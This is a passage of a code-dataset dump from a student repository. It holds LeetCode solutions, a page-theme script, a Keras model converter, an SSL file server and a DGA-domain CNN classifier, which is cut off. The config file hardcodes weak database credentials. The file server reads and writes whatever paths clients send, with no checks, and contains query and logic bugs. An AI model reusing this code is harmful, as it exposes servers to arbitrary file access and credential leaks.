0,1,2,....,amount. the index represents the amount we want to reach\n        subproblems=[float(\"inf\")]*(amount+1)\n        subproblems[0]=0\n\n        for i,sub in enumerate(subproblems):\n            for coin in coins:\n                #Obviously, if the coin is larger than the current amount, no need to check it\n                if i-coin>=0:\n                    subproblems[i]=min(subproblems[i],subproblems[i-coin]+1)\n\n        if subproblems[-1]==float('inf'):\n            return -1\n        return subproblems[-1]\n\n#Problem 2: House Robber\n#Time Complexity O(N) ( O(2*N) but we ignore the constant)\n#Space Complexity O(N)\n#Worked on leetcode? : Yes\n\n'''\nidea: divide into subproblems: how much can I rob up to house 0, house 1, house 2, etc. At each index, I can check: is it better to skip this house\nand keep the max amount from the index before, or to rob this house and add its value to the max amount from two indices back? Since the previous\nsubproblems are already solved as we traverse, there is no need to worry about the best combination before this house, nor that an adjacent house was taken in the subproblems; we just can't take both the previous house and the current one. We initialise zero houses at 0 and one house at the value of the first house,\nsince obviously if there's only one house we rob it.\n'''\nclass Solution:\n    def rob(self, nums: List[int]) -> int:\n        #edge case\n        if not nums:\n            return 0\n        subproblems=[0]*(len(nums)+1)\n        subproblems[1]=nums[0]\n        #careful, the index of the subproblem represents the number of houses, not the house index\n        #for the house index we do subproblems_index-1\n        for i in range(2,len(subproblems)):\n            #i-2 is the subproblem two houses back\n            #or is it better to just skip this house?\n            subproblems[i]=max(nums[i-1]+subproblems[i-2],subproblems[i-1])\n        return subproblems[-1]\n" } ]
1
1flurry/Xiaoyu.github.io
https://github.com/1flurry/Xiaoyu.github.io
4657c8671644322638600d52ba7ae24ec8f89fc2
4f106b5c9370f0fb098b90263bf3f46db1e8bd51
7643b627c2f7675411c7a062aaf1c36b66c2d52b
refs/heads/master
2020-03-25T20:16:09.826626
2018-09-29T09:30:46
2018-09-29T09:30:46
144,123,663
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.54347825050354, "alphanum_fraction": 0.614130437374115, "avg_line_length": 45, "blob_id": "6d4edf8d56389c7d8052b3e7929b513af3aed356", "content_id": "9755dc3975f28ba5092f0f0c1e20e3b880f2ad54", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "permissive", "max_line_length": 109, "num_lines": 12, "path": "/search/service/configs.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 数据存储\n# DATA_REDIS = {'host': '10.250.179.150', 'port': 6379, 'password': 'redis#dev'}\n# DATA_REDIS = {'host': 'localhost', 'port': 6379, 'password': None}\nDATA_MYSQL = {'host': \"localhost\", 'user': \"root\", 'password': \"123456\", 'database': \"AIE_Detect_Result\"}\n# CFG_REDIS = {'host': '10.250.179.150', 'port': 6379, 'password': 'redis#dev'}\nCFG_REDIS = {'host': 'localhost', 'port': 6380, 'password': None}\n\nALGORITHM_CFG_TABLE = '__algorithm_cfg_table__'\nALGORITHM_RST_TABLE = '__algorithm_rst_'\n" }, { "alpha_fraction": 0.49035876989364624, "alphanum_fraction": 0.5616454482078552, "avg_line_length": 27.52666664123535, "blob_id": "d4a4ba83c47ae382b20acabcf4925593c1962621", "content_id": "a2166c7aa9b07274b1e1bde7dd545cd5b034472b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8585, "license_type": "permissive", "max_line_length": 62, "num_lines": 300, "path": "/个人主页2_files/hf.js", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "GB18030", "text": "var listactive = \"listactive01\";\n\n//个性化选择预览\nfunction work_ys(obj)\n{\n var_ys = obj;\n var which = obj;\n var bodybg,\n topbg,\n btncolor,\n bgimg,\n bannerimg,\n lxfsbtncolor;\n\n\tswitch (Number(which)) {\n\t\tcase 1:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#798399\";\n\t\t\tbtncolor = \"#939fb8\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img0_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img0_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#939fb8\";\n\t\t\tlistactive = \"listactive20\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tbodybg = \"#fffdca\";\n\t\t\ttopbg = \"#716f24\";\n\t\t\tbtncolor = \"#b5b136\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-02.jpg)\";\n\t\t\tlxfsbtncolor = \"#858228\";\n\t\t\tlistactive = \"listactive02\";\n\t\t\tbreak;\n\t\tcase 3:\n\t\t\tbodybg = \"#d6c5a7\";\n\t\t\ttopbg = \"#665f4f\";\n\t\t\tbtncolor = \"#9b8353\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-03.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-03.jpg)\";\n\t\t\tlxfsbtncolor = \"#826e46\";\n\t\t\tlistactive = \"listactive03\";\n\t\t\tbreak;\n case 4:\n bodybg = \"#ebeceb\";\n topbg = \"#1d324e\";\n btncolor = \"#204473\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-04.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-04.jpg)\";\n lxfsbtncolor = \"#204473\";\n\t\t\tlistactive = \"listactive04\";\n\t\t\tbreak;\n case 5:\n bodybg = \"#edfdfb\";\n topbg = \"#46886e\";\n btncolor = \"#78b19b\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-05.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-05.jpg)\";\n lxfsbtncolor = \"#78b19b\";\n\t\t\tlistactive = \"listactive05\";\n\t\t\tbreak;\n case 6:\n bodybg = \"#eaeef6\";\n topbg = \"#2462ae\";\n btncolor = \"#3075c9\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-06.jpg)\";\n bannerimg = \"url(\" + var_path + 
\"web/hf/banner-06.jpg)\";\n lxfsbtncolor = \"#3075c9\";\n\t\t\tlistactive = \"listactive06\";\n\t\t\tbreak;\n case 7:\n bodybg = \"#f6f6e4\";\n topbg = \"#b0ac90\";\n btncolor = \"#cdc8a9\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-07.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-07.jpg)\";\n lxfsbtncolor = \"#cdc8a9\";\n\t\t\tlistactive = \"listactive07\";\n\t\t\tbreak;\n case 8:\n bodybg = \"#e9f0f5\";\n topbg = \"#4d697a\";\n btncolor = \"#628ca4\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-08.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-08.jpg)\";\n lxfsbtncolor = \"#628ca4\";\n\t\t\tlistactive = \"listactive08\";\n\t\t\tbreak;\n case 9:\n bodybg = \"#ffffff\";\n topbg = \"#e04421\";\n btncolor = \"#f25e3d\";\n bgimg = \"url(\" + var_path + \"web/hf/bgimg-09.jpg)\";\n bannerimg = \"url(\" + var_path + \"web/hf/banner-09.jpg)\";\n lxfsbtncolor = \"#f25e3d\";\n\t\t\tlistactive = \"listactive09\";\n\t\t\tbreak;\n\t\tcase 11:\n\t\t\tbodybg = \"#ffddc7\";\n\t\t\ttopbg = \"#d97058\";\n\t\t\tbtncolor = \"#ffc156\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/bgimg-01.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/banner-01.jpg)\";\n\t\t\tlxfsbtncolor = \"#bd8e3e\";\n\t\t\tlistactive = \"listactive01\";\n\t\t\tbreak;\n\t\tcase 13:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#1f5992\";\n\t\t\tbtncolor = \"#276fb5\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/1-1.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/1-11.jpg)\";\n\t\t\tlxfsbtncolor = \"#276fb5\";\n\t\t\tlistactive = \"listactive11\";\n\t\t\tbreak;\n\t\tcase 14:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#1d61ec\";\n\t\t\tbtncolor = \"#296fff\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/4-4.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/4-44.jpg)\";\n\t\t\tlxfsbtncolor = \"#296fff\";\n\t\t\tlistactive = \"listactive14\";\n\t\t\tbreak;\n\t\tcase 21:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#89551d\";\n\t\t\tbtncolor = \"#a9671f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img1_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img1_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#a9671f\";\n\t\t\tlistactive = \"listactive21\";\n\t\t\tbreak;\n\t\tcase 22:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#d18524\";\n\t\t\tbtncolor = \"#e3932d\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img2_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img2_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#e3932d\";\n\t\t\tlistactive = \"listactive22\";\n\t\t\tbreak;\n\t\tcase 23:\n\t\t\tbodybg = \"#fff\";\n\t\t\ttopbg = \"#84828d\";\n\t\t\tbtncolor = \"#8c8b92\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img3_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img3_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#8c8b92\";\n\t\t\tlistactive = \"listactive23\";\n\t\t\tbreak;\n\t\tcase 24:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#a3408f\";\n\t\t\tbtncolor = \"#d254b9\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img4_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img4_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#d254b9\";\n\t\t\tlistactive = \"listactive24\";\n\t\t\tbreak;\n\t\tcase 25:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#0c1036\";\n\t\t\tbtncolor = \"#29317f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img5_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img5_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#29317f\";\n\t\t\tlistactive = \"listactive25\";\n\t\t\tbreak;\n\t\tcase 26:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = 
\"#565b45\";\n\t\t\tbtncolor = \"#7c855e\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img6_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img6_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#7c855e\";\n\t\t\tlistactive = \"listactive26\";\n\t\t\tbreak;\n\t\tcase 27:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#494546\";\n\t\t\tbtncolor = \"#746e6f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img7_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img7_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#746e6f\";\n\t\t\tlistactive = \"listactive27\";\n\t\t\tbreak;\n\t\tcase 31:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#f69c5c\";\n\t\t\tbtncolor = \"#f8ae7a\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img31_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img31_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#f8ae7a\";\n\t\t\tlistactive = \"listactive31\";\n\t\t\tbreak;\n\t\tcase 32:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#6d6e25\";\n\t\t\tbtncolor = \"#8d8e25\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img32_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img32_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#8d8e25\";\n\t\t\tlistactive = \"listactive32\";\n\t\t\tbreak;\n\t\tcase 33:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#313c47\";\n\t\t\tbtncolor = \"#475562\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img33_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img33_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#475562\";\n\t\t\tlistactive = \"listactive33\";\n\t\t\tbreak;\n\t\tcase 34:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#494546\";\n\t\t\tbtncolor = \"#746e6f\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img34_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img34_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#746e6f\";\n\t\t\tlistactive = \"listactive34\";\n\t\t\tbreak;\n\t\tcase 35:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#102633\";\n\t\t\tbtncolor = \"#1d4a65\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img35_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img35_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#1d4a65\";\n\t\t\tlistactive = \"listactive35\";\n\t\t\tbreak;\n\t\tcase 36:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#fea701\";\n\t\t\tbtncolor = \"#feba39\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img36_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img36_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#feba39\";\n\t\t\tlistactive = \"listactive36\";\n\t\t\tbreak;\n\t\tcase 37:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#1f5992\";\n\t\t\tbtncolor = \"#276fb5\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img37_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img37_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#276fb5\";\n\t\t\tlistactive = \"listactive37\";\n\t\t\tbreak;\n\t\tcase 38:\n\t\t\tbodybg = \"#ECECEC\";\n\t\t\ttopbg = \"#a82b3a\";\n\t\t\tbtncolor = \"#c73244\";\n\t\t\tbgimg = \"url(\" + var_path + \"web/hf/img38_02.jpg)\";\n\t\t\tbannerimg = \"url(\" + var_path + \"web/hf/img38_03.jpg)\";\n\t\t\tlxfsbtncolor = \"#c73244\";\n\t\t\tlistactive = \"listactive38\";\n\t\t\tbreak;\n\t}\n\t$(\".hf-bodybg\").css(\"background-color\", bodybg);\n\t$(\".hf-topbg,.bqxz\").css(\"background-color\", topbg);\n\t//$(\".hf-bordor\").css(\"border-color\", topbg);\n\t$(\".hf-btncolor\").css(\"background-color\", btncolor);\n\t$(\".hf-bgimg\").css(\"background-image\", bgimg);\n\t$(\".hf-bannerimg\").css(\"background-image\", bannerimg);\n\t$(\".hf-lxfsbtn\").css(\"background-color\", 
lxfsbtncolor);\n\t$(\".hf-color\").css(\"color\", topbg);\n\t$(\".biaoqianline a\").removeClass();\n\t$(\".biaoqianline a\").eq(0).addClass(listactive);\n\t$(\".biaoqianline a\").click(function(){\n $(\".biaoqianline a\").removeClass();\n $(this).addClass(listactive);\n });\n \n try {\n if (typeof(var_yqid) != \"undefined\"){ \n work_dh(var_yqid);\n }\n }catch(e){}\n}\n//个性化选择保存\nfunction work_submit(yhid) {\n which = var_ys;\n \n $.ajax({\n type: \"post\",\n url: var_path + \"web/stage2/grxx_do.jsp\",\n data: {\n operate: \"ys\",\n ys: which,\n yhid: yhid\n },\n success: function(data) {\n $('#myModal').modal('hide');\n var_java_ys = which;\n work_ys(which);\n work_dh(var_yqid);\n }\n });\n}" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7065081596374512, "avg_line_length": 43.38888931274414, "blob_id": "8528181e94dad0d20790a17bf707ac57ad3d07b5", "content_id": "6dd7df87648cc884952f43399dc441c3841b2d25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "permissive", "max_line_length": 111, "num_lines": 36, "path": "/AIE/change/keras_to_tensorflow.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import sys\nfrom keras.models import load_model\nimport tensorflow as tf\nimport os\nimport os.path as osp\nfrom keras import backend as K\nfrom tensorflow.python.framework import graph_io\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,output_names, freeze_var_names)\n return frozen_graph\n\n#input_fld = sys.path[0]\nweight_file = 'cnn-2121.h5'\noutput_graph_name = 'model.pb'\noutput_fld = 'D:/tensorflow_model/'\nif not os.path.isdir(output_fld):\n os.mkdir(output_fld)\nweight_file_path = osp.join('D:/', weight_file)\nK.set_learning_phase(0)\nnet_model = load_model(weight_file_path)\nprint('input is :', net_model.input.name)\nprint ('output is:', net_model.output.name)\nsess = K.get_session()\nfrozen_graph = freeze_session(K.get_session(), output_names=[net_model.output.op.name])\ngraph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)\nprint('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))\n" }, { "alpha_fraction": 0.49390003085136414, "alphanum_fraction": 0.5064935088157654, "avg_line_length": 23.190475463867188, "blob_id": "d27897fb7eb1f6c90d7b62bfe223b739b497bbe7", "content_id": "0aaf9c6e9ad18f6235157626c76eb58eb3ba3611", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2625, "license_type": "permissive", "max_line_length": 78, "num_lines": 105, "path": "/security/server_main.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import _thread\nimport time\nimport sys\nimport os\n#import log\n#import db_update\nimport sqlite3\nimport socket\nimport thread\nMAX_THR_NUM = 100\n\nclass FilePackage:\n def __init__(self):\n self.cmd 
= ''\n self.filesize = 0\n self.ack = 0\n self.username = ''\n self.filename = ''\n #mode_t mode; // 文件的权限\n self.buf = ''\n\nclass server:\n def __init__(self):\n self.cmd = ''\n self.filesize = 0\n self.ack = 0\n self.username = ''\n self.filename = ''\n #mode_t mode; // 文件的权限\n self.buf = ''\n\n def InitMaxClientNum():\n buf = \"\"\n with open(\"./maxclientnum.txt\",\"r\") as fd:\n nBytes=fd.readlines()\n for n in nBytes:\n if int(n) < 0:\n print(\"Data Error!(need > 0)\")\n return -1\n return int(n)\n\n #管理员身份认证模块\n def CheckAdmin(id,pwd):\n conn = sqlite3.connect('admin_db.db')\n cursor = conn.execute(\"SELECT PASSWORD from admin where ID = ?\",[id])\n for row in cursor:\n if pwd == row[0]:\n conn.close()\n return 1\n else:\n conn.close()\n return 0\n\n #管理员登录模块\n def login():\n flag = 0\n while flag != 1:\n print(\"Admin Id:\")\n Adminid = input()\n print(\"Admin Password\")\n Adminpwd = input()\n res = server.CheckAdmin(int(Adminid),Adminpwd)\n if res == 1:\n flag = 1\n print('login sucess!')\n else:\n print('login faile!')\n\ndef Process(CurrentClientNum):\n sendPackage = FilePackage()\n CurrentClientNum = CurrentClientNum + 1\n if CurrentClientNum > maxClientNum:\n sendPackage = pack('L',\" \",\" \",0,2,1,\"\")\n CurrentClientNum = CurrentClientNum - 1\n return 0\n buff = FilePackage()\n \n\n \n\nif __name__ == '__main__':\n maxClientNum = server.InitMaxClientNum()\n CurrentClientNum = 0\n print('Max Client Number is',maxClientNum)\n server.login()\n test = thread.MainThread()\n test.server()\n\n \n'''\ndef print_time( threadName, delay):\n count = 0\n while count < 5:\n time.sleep(delay)\n count += 1\n print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\n\ntry:\n\t#界面线程\n _thread.start_new_thread( print_time, (\"ControId\", 2, ) )\n #处理数据线程\n _thread.start_new_thread( print_time, (\"Thread-2\", 4, ) )\nexcept:\n print (\"Error: 无法启动线程\")\n'''\n\n" }, { "alpha_fraction": 0.47889038920402527, "alphanum_fraction": 0.48998647928237915, "avg_line_length": 35.04878234863281, "blob_id": "3cfd45bb521aaf83beb5aae93b70944b0ac901e6", "content_id": "04ff4bdba9439764452f7e0e8116295847d5dd95", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7404, "license_type": "permissive", "max_line_length": 159, "num_lines": 205, "path": "/security/server.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import os\nimport socket\nimport hashlib\nimport threading\nimport time\nimport struct\nimport ssl\nimport sqlite3\n\ndef InitMaxClientNum():\n buf = \"\"\n with open(\"./maxclientnum.txt\",\"r\") as fd:\n nBytes=fd.readlines()\n for n in nBytes:\n if int(n) < 0:\n print(\"Data Error!(need > 0)\")\n return -1\n return int(n)\n \ndef InitHost():\n host = \"\"\n with open(\"./host.txt\",\"r\") as fd:\n n2 = fd.readlines()\n for n in n2:\n return n\n\ndef tcplink(sock, addr):\n print('Accept new connection from ' ,addr)\n sock.send(b'Welcome!')\n while True:\n data = sock.recv(1024)\n time.sleep(1)\n if not data or data.decode('utf-8') == 'exit':\n break\n sock.send(('Hello, %s!' 
% data.decode('utf-8')).encode('utf-8'))\n sock.close()\n print('Connection from '+str(addr)+' closed')\n\n\n \n\nclass FileServer:\n def __init__(self):\n self.dataFormat = '20s20s8s32s100s100sl'\n self.cafile = \"./cert/ca.crt\"\n self.certfile = \"./cert/server.pem\"\n #soketlen_t clie_len\n\n def struct_pack(self):\n ret = struct.pack(self.dataFormat, self.username.encode(), self.pwd.encode(), self.action.encode(), self.md5sum.encode(), self.clientfilePath.encode(),\n self.serverfilePath.encode(), self.size)\n return ret\n \n def struct_unpack(self, package):\n self.username, self.pwd, self.action, self.md5sum, self.clientfilePath, self.serverfilePath, self.size = struct.unpack(self.dataFormat, package)\n self.username = self.username.decode().strip('\\x00')\n self.pwd = self.pwd.decode().strip('\\x00')\n self.action = self.action.decode().strip('\\x00')\n self.md5sum = self.md5sum.decode().strip('\\x00')\n self.clientfilePath = self.clientfilePath.decode().strip('\\x00')\n self.serverfilePath = self.serverfilePath.decode().strip('\\x00')\n\n def CheckUsers(self,sock,addr):\n fileinfo_size = struct.calcsize(self.dataFormat)\n self.buf = sock.recv(fileinfo_size)\n if self.buf:\n self.struct_unpack(self.buf)\n name = self.username\n pwd = self.pwd\n print(name,pwd)\n\n conn = sqlite3.connect('admin_db.db')\n print (\"Opened database successfully\")\n cursor = conn.execute(\"SELECT PASSWORD from admin where ID = ?\",list(name))\n for row in cursor:\n if pwd == row[0]:\n sock.send(b'1')\n filelist = self.GetFileList()\n sock.send(filelist.encode())\n self.FileSave(sock, addr)\n\n else:\n sock.send(b'0')\n print(\"error\")\n '''\n sock.close()\n print('Connection from {0} closed.'.format(addr))\n conn.close()\n '''\n return 0\n\n def GetFileList(self):\n files= os.listdir(\"./server_data\")\n return \",\".join(files)\n\n def GetMD5(self,filepath):\n fd = open(filepath,\"r\")\n fcont = fd.readlines()\n fd.close()\n fmd5 = hashlib.md5(str(fcont).encode(\"utf-8\"))\n return fmd5.hexdigest() \n\n def FileSave(self,sock,addr):\n print ('Accept new connection from {0}'.format(addr))\n while True:\n fileinfo_size = struct.calcsize(self.dataFormat)\n self.buf = sock.recv(fileinfo_size)\n if self.buf:\n self.struct_unpack(self.buf)\n print(self.action)\n\n if self.action.startswith(\"upload\"):\n if os.path.isdir(self.serverfilePath):\n fileName = (os.path.split(self.clientfilePath))[1]\n self.serverfilePath = os.path.join(self.serverfilePath, fileName)\n filePath,fileName = os.path.split(self.serverfilePath)\n if not os.path.exists(filePath):\n sock.send(str.encode('dirNotExist'))\n else:\n sock.send(str.encode('ok'))\n recvd_size = 0\n file = open(self.serverfilePath, 'wb')\n while not recvd_size == self.size:\n if self.size - recvd_size > 1024:\n rdata = sock.recv(1024)\n recvd_size += len(rdata)\n else:\n rdata = sock.recv(self.size - recvd_size)\n recvd_size = self.size\n file.write(rdata)\n file.close()\n output = self.GetMD5(self.serverfilePath)\n if output == self.md5sum:\n sock.send(str.encode('ok'))\n else:\n sock.send(str.encode('md5sum error'))\n\n elif self.action.startswith(\"download\"):\n filePath,fileName = os.path.split(self.serverfilePath)\n print(self.serverfilePath)\n if os.path.exists(filePath):\n self.md5sum = self.GetMD5(self.serverfilePath)\n self.action = 'ok'\n self.size = os.stat(self.serverfilePath).st_size\n ret = self.struct_pack()\n sock.send(ret)\n fo = open(self.serverfilePath, 'rb')\n while True:\n filedata = fo.read(1024)\n if not filedata:\n break\n 
sock.send(filedata)\n fo.close()\n else:\n self.action = 'nofile'\n ret = self.struct_pack()\n sock.send(ret)\n \n sock.close()\n print('Connection from {0} closed.'.format(addr))\n break\n\n\n def server(self):\n maxclientnum = InitMaxClientNum()\n server_port = 9999\n host = InitHost()\n\n purpose = ssl.Purpose.CLIENT_AUTH\n context = ssl.create_default_context(purpose, cafile=self.cafile)\n context.load_cert_chain(self.certfile)\n\n try:\n socketfd = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n print(socketfd)\n except:\n print(\"Socket Build Error!\")\n else:\n socketfd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n socketfd.bind((host,server_port))\n except:\n print(\"Sokcet Bind Error!\")\n else:\n try:\n socketfd.listen(maxclientnum)\n except:\n print(\"Socket Listen Error!\")\n else:\n print('Waiting for connection...')\n while True:\n # 接受一个新连接:\n sock, addr = socketfd.accept()\n\n ssl_sock = context.wrap_socket(sock, server_side=True)\n t1 = threading.Thread(target=self.CheckUsers, args=(ssl_sock, addr))\n t1.start()\n \n\n\n\nif __name__ == '__main__':\n test = FileServer()\n test.server()\n #test.server()\n" }, { "alpha_fraction": 0.551189124584198, "alphanum_fraction": 0.5778964757919312, "avg_line_length": 39.271793365478516, "blob_id": "7696448af9e1b693893c94ef3fb385345fbb76dd", "content_id": "94a97ed1c7f936d63d3458e835d732ae43a37e50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8425, "license_type": "permissive", "max_line_length": 265, "num_lines": 195, "path": "/AIE/tensorflow/cnn.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nfrom datetime import timedelta\nimport numpy as np\nimport tensorflow as tf\nimport sklearn\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\nimport tldextract\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.framework import graph_util\n\n'''数据预处理'''\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[0:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\ndef makeData(black=\"./data/dga.txt\",white=\"./data/top-1m.csv\"):\n X = []\n Y = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n Y.append([0])\n with open(\"./data/top-1m.csv\",'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))\n Y.append([1])\n X=np.mat(X)\n Y=np.mat(Y)\n return X,Y\ndef batch_iter(x, y, batch_size=512):\n \"\"\"生成批次数据\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = x[indices]\n y_shuffle = y[indices]\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]\n\n'''获取已使用时间'''\ndef get_time_dif(start_time):\n end_time = time.time()\n time_dif = end_time - 
